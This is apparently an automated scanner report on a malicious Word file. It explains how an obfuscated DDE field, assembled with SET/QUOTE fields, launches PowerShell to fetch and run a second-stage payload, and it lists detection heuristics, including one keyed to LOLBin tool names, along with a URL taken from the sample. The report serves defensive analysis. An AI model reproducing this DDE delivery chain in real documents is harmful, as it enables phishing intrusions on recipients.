MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a malicious DDE command that, when executed, attempts to run a PowerShell command. This PowerShell command is designed to download a second-stage payload from a provided URL and execute it. The DDE command itself is obfuscated using SET and QUOTE fields, which reconstructs the command string. The presence of external hyperlinks and the DDE execution strongly indicate a malicious intent to download and run further malicious content.
Heuristics 5
-
Malicious DDE command critical OOXML_DDE_MALICIOUSDDE field in word/document.xml launches a dangerous executable: powershell
-
Word field-chain (SET/REF) co-located with DDE high OOXML_FIELD_SET_REF_CHAINING2 SET/REF variable pair(s) co-occur with DDE field(s) in word/document.xml
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKSDocument contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: http://ckattrans.spb.ru/
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://ckattrans.spb.ru/Document hyperlink
- https://spb.hh.ru/employer/600756Document hyperlink
- https://spb.hh.ru/employer/995956Document hyperlink
Open this report in the interactive analyzer, or submit your own file for analysis.